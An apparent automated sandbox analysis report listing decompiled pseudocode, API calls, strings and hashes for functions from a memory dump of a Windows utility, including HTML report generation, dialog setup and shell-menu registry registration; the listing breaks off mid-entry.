SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

APIs

memset.MSVCRT ref: 0040AEB2
memset.MSVCRT ref: 0040AEC7
wcscpy.MSVCRT ref: 0040AEF9
_snwprintf.MSVCRT ref: 0040AF19
wcscat.MSVCRT ref: 0040AF26
_snwprintf.MSVCRT ref: 0040AF55
wcscat.MSVCRT ref: 0040AF62
wcscat.MSVCRT ref: 0040AF70
wcscat.MSVCRT ref: 0040AF82
wcscat.MSVCRT ref: 0040AF8D
wcscat.MSVCRT ref: 0040AF9F
wcscat.MSVCRT ref: 0040AFB1

Strings

<font, xrefs: 0040AEF3
</b>, xrefs: 0040AF99
</font>, xrefs: 0040AFAB
size="%d", xrefs: 0040AF08
<b>, xrefs: 0040AF7C
color="#%s", xrefs: 0040AF44

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}

APIs

Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34

DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
GetDlgItem.USER32 ref: 00403C2F
SetWindowLongW.USER32 ref: 00403C39

Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16

GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
LoadImageW.USER32 ref: 00403C6A
GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
LoadImageW.USER32 ref: 00403C7F
SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
GetDlgItem.USER32 ref: 00403CB0

Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5

GetDlgItem.USER32 ref: 00403CC2
GetDlgItem.USER32 ref: 00403CD4

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

GetDlgItem.USER32 ref: 00403D64
GetDlgItem.USER32 ref: 00403DC0
GetDlgItem.USER32 ref: 00403DF0
GetDlgItem.USER32 ref: 00403E20
GetDlgItem.USER32 ref: 00403E4F
SendDlgItemMessageW.USER32 ref: 00403E87
GetDlgItem.USER32 ref: 00403E9B
SetFocus.USER32(00000000), ref: 00403E9E

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
String ID:
API String ID: 1038210931-0
Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59

Uniqueness

Uniqueness Score: -1.00%

Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}

APIs

memset.MSVCRT ref: 00407784
memset.MSVCRT ref: 004077AE
memset.MSVCRT ref: 004077C4
memset.MSVCRT ref: 004077DA
_snwprintf.MSVCRT ref: 00407813
wcscpy.MSVCRT ref: 0040785E
_snwprintf.MSVCRT ref: 004078EB
wcscat.MSVCRT ref: 0040791D

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

wcscpy.MSVCRT ref: 004078FF
_snwprintf.MSVCRT ref: 0040795C

Strings

 , xrefs: 00407917
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040778C
bgcolor="%s", xrefs: 00407805
<font color="%s">%s</font>, xrefs: 004078DE
</table><p>, xrefs: 00407980
nowrap, xrefs: 00407858
<table border="1" cellpadding="5">, xrefs: 0040781B

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}

APIs

memset.MSVCRT ref: 00407B83
memset.MSVCRT ref: 00407B98
memset.MSVCRT ref: 00407BAD
_snwprintf.MSVCRT ref: 00407BDC
_snwprintf.MSVCRT ref: 00407C0B
wcscpy.MSVCRT ref: 00407C1C
_snwprintf.MSVCRT ref: 00407C3C
memset.MSVCRT ref: 00407C7B
_snwprintf.MSVCRT ref: 00407C9C
_snwprintf.MSVCRT ref: 00407CD6

Part of subcall function 0040ADC0: _snwprintf.MSVCRT ref: 0040ADE4

Strings

width="%s", xrefs: 00407C8B
bgcolor="%s", xrefs: 00407BCB
</font>, xrefs: 00407C16
<table border="1" cellpadding="5"><tr%s>, xrefs: 00407C2B
<th%s>%s%s%s, xrefs: 00407CC5
<font color="%s">, xrefs: 00407BFA

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124
registryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}

APIs

memset.MSVCRT ref: 00404452
_snwprintf.MSVCRT ref: 00404473

Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC

RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB

Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
memset.MSVCRT ref: 004044CF

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

GetDriveTypeW.KERNEL32(?), ref: 00404518
memset.MSVCRT ref: 00404539
memset.MSVCRT ref: 0040454E
_snwprintf.MSVCRT ref: 00404571
_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

%s\shell\%s, xrefs: 00404564
C:\, xrefs: 004044F1
"%s",0, xrefs: 0040457D
:, xrefs: 004044E3
%s\shell\%s\command, xrefs: 00404462

Memory Dump Source

Source File: 0000001C.00000002.879809887.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001C.00000002.879762936.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879906367.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.879925582.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.879953650.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

TranslatorURL, xrefs: 00406520
general, xrefs: 004064F8
